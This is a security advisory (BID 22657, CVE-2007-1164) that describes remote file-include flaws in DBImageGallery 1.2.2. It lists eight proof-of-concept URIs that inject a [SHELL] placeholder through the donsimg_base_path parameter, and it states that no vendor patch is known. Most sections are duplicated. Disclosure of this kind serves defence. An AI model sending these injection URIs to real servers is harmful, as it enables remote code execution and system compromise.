DBImageGallery DonsImg_Base_Path Parameter Multiple Remote File Include Vulnerabilities
BID:22657
Info
DBImageGallery DonsImg_Base_Path Parameter Multiple Remote File Include Vulnerabilities
| Bugtraq ID: | 22657 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-1164 |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 21 2007 12:00AM |
| Updated: | May 07 2015 06:02PM |
| Credit: | Denven is credited with the discovery of this vulnerability. |
| Vulnerable: |
DBScripts DBImageGallery 1.2.2 |
| Not Vulnerable: | |
Discussion
DBImageGallery DonsImg_Base_Path Parameter Multiple Remote File Include Vulnerabilities
DBImageGallery is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
This issue affects version 1.2.2; other versions may also be vulnerable.
DBImageGallery is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
This issue affects version 1.2.2; other versions may also be vulnerable.
Exploit / POC
DBImageGallery DonsImg_Base_Path Parameter Multiple Remote File Include Vulnerabilities
An attacker can exploit these issues via a web client.
The following proof-of-concept URIs are available:
http://www.example.com/path/admin/attributes.php?donsimg_base_path=[SHELL]
http://www.example.com/path/admin/images.php?donsimg_base_path=[SHELL]
http://www.example.com/path/admin/scan.php?donsimg_base_path=[SHELL]
http://www.example.com/path/includes/attributes.php?donsimg_base_path=[SHELL]
http://www.example.com/path/includes/db_utils.php?donsimg_base_path=[SHELL]
http://www.example.com/path/includes/images.php?donsimg_base_path=[SHELL]
http://www.example.com/path/includes/utils.php?donsimg_base_path=[SHELL]
http://www.example.com/path/includes/values.php?donsimg_base_path=[SHELL]
An attacker can exploit these issues via a web client.
The following proof-of-concept URIs are available:
http://www.example.com/path/admin/attributes.php?donsimg_base_path=[SHELL]
http://www.example.com/path/admin/images.php?donsimg_base_path=[SHELL]
http://www.example.com/path/admin/scan.php?donsimg_base_path=[SHELL]
http://www.example.com/path/includes/attributes.php?donsimg_base_path=[SHELL]
http://www.example.com/path/includes/db_utils.php?donsimg_base_path=[SHELL]
http://www.example.com/path/includes/images.php?donsimg_base_path=[SHELL]
http://www.example.com/path/includes/utils.php?donsimg_base_path=[SHELL]
http://www.example.com/path/includes/values.php?donsimg_base_path=[SHELL]
Solution / Fix
DBImageGallery DonsImg_Base_Path Parameter Multiple Remote File Include Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
DBImageGallery DonsImg_Base_Path Parameter Multiple Remote File Include Vulnerabilities
References:
References:
- DBImageGallery Homepage (DBScripts)
- Remote File Include In DBImageGallery (RaeD Hasadya)